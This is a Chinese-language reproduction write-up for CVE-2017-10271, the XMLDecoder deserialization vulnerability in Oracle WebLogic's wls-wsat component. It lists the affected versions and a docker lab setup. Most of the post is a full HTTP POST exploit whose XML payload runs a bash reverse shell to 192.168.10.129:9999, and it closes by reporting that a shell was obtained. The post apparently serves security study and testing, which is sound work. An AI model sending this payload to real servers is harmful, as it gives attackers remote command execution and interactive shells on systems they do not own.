Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2017-10271

Oracle 2022-09-02

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

参考链接

影响版本

  • Oracle WebLogic Server 10.3.6.0.0版本
  • Oracle WebLogic Server 12.1.3.0.0版本
  • Oracle WebLogic Server 12.2.1.1.0版

环境搭建

启动测试环境:

docker-compose up -d

等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。

漏洞复现

漏洞存在于以下路径:/wls-wsat/CoordinatorPortType11

正常访问如下

发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误):

点击查看代码 
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.10.129/9999 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

成功获取shell

相关文章

java oracle 结果集
Java Oracle 结果集是Java语言中处理数据库查询结果的一种方...
java aes oracle aes
Java AES和Oracle AES是现代加密技术中最常使用的两种AES加密...
java oracle11g 驱动
Java是一种广泛应用的编程语言,具备可靠性、安全性、跨平台...
java int oracle
随着移动互联网的发展,抽奖活动成为了营销活动中不可或缺的...
java oracle对照
Java和Oracle都是在计算机领域应用非常广泛的技术,他们经常...
java oracle 参数
Java 是一门非常流行的编程语言,它可以运行于各种操作系统上...